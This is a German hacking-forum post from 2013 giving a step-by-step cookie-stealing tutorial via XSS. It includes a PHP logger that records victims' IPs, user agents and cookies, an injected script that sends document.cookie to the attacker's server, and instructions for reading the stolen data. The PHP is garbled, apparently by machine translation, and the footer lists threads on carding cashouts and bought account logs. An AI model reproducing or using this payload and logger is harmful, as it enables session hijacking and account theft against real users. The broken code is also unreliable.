[How to] Cookie Stealing via Xss

Als Gast hast du nur eingeschränkten Zugriff!

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

Antworte auf Themen oder erstelle deine eigenen.
Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.

Ich habe euch hier ein kleines Script, welches ich soeben noch auf meiner Platte gefunden habe, mit welchem Ihr via Xss Lücke Cookies Stealen könnt.

Das ganze sieht so aus :

1 x whateveryouwant.php

&

1 x log.txt ( leeres .txt Dokument)

(Beide auf euren Webserver uppn.)

<? Php

Funktion Getip ()
{
if (getenv ("http_client_ip") && strcasecmp (getenv ("http_client_ip"), "unknown"))
$ Ip = getenv ("http_client_ip");
else if (getenv ("HTTP_X_FORWARDED_FOR") && strcasecmp (getenv ("HTTP_X_FORWARDED_FOR"), "unknown"))
$ Ip = getenv ("HTTP_X_FORWARDED_FOR");
else if (getenv ("REMOTE_ADDR") && strcasecmp (getenv ("REMOTE_ADDR"), "unknown"))
$ Ip = getenv ("REMOTE_ADDR");
else if (isset ($ _SERVER ['REMOTE_ADDR']) && $ _SERVER ['REMOTE_ADDR'] && strcasecmp ($ _SERVER ['REMOTE_ADDR'], "unknown"))
$ Ip = $ _SERVER ['REMOTE_ADDR'];
sonst
$ Ip = "unbekannt";
return ($ ip);
}

Funktion Logdaten ()
{
$ IpLog = "log.txt";
$ Cookie = $ _SERVER ['QUERY_STRING'];
$ Register_globals = (bool) ini_get ('register_gobals');
if ($ register_globals) $ ip = getenv ('REMOTE_ADDR');
else $ ip = Getip ();

$ Rem_port = $ _SERVER ['REMOTE_PORT'];
$ User_agent = $ _SERVER ['HTTP_USER_AGENT'];
$ Rqst_method = $ _SERVER ['Methode'];
$ Rem_host = $ _SERVER ['REMOTE_HOST'];
$ Referer = $ _SERVER ['HTTP_REFERER'];
$ Datum = date ("l dS des Geschäftsjahres h: i: s A");
$ Log = fopen ("$ ipLog", "a +");

if (preg_match ("/  bhtm  b / i", $ ipLog) | | preg_match ("/  bhtml  b / i", $ ipLog))
fputs ($ log, "IP: $ ip | PORT: $ rem_port | HOST: $ rem_host | Agent: $ user_agent | METHOD: $ rqst_method | REF: $ referer | DATUM {:} $ date | COOKIE: $ cookie <br> ");
sonst
fputs ($ log, "IP: $ ip | PORT: $ rem_port | HOST: $ rem_host | Agent: $ user_agent | METHOD: $ rqst_method | REF: $ referer | DATUM: $ date | COOKIE: $ cookie  n  n" );
fclose ($ log);
}

Logdaten ();

?>

Habt Ihr nun eine xss Lücke gefunden, so könnt Ihr die "Whateveryouwant.php" einfügen, bzw ausführen lassen. Das ganze geht mir folgendem "Befehl":

"> <script Language= "Javascript"> document.location =" http://euerlinkzueuremwebserver/whateveryouwant.php?cookie = "+ document.cookie; document.location =" TARGET URL " </ script>

Nun ruft Ihr in eurem Browser die log.txt auf :

http://euerlinkzueuremwebserver/log.txt

Nun bekommt Ihr die Ip des Vics, sowie Cookies des Vics angezeigt, Viel spass damit, jedoch bitte bedenkt das dieser Vorgang Illegal ist.

Edited by CyberFlash, 22 September 2013 - 22:52 Uhr.

Topic	Forum	Started By	Stats	Last Post Info
CC Cashout via Bankautomat	Hilfe / Fragen / Unterstützung	eisfeld999	0 replies 100 views	Yesterday, 16:09 By: eisfeld999
How to withdraw funds from your Cash App log you bought from	Abgelehnt / Rejected	RiseLerson	0 replies 2052 views	14 September 2024 - 04:32 Uhr By: RiseLerson
COOKIE CONVERTER TOOL BY FRANKLIN	Leaks	annaa	0 replies 297 views	30 July 2024 - 18:11 Uhr By: annaa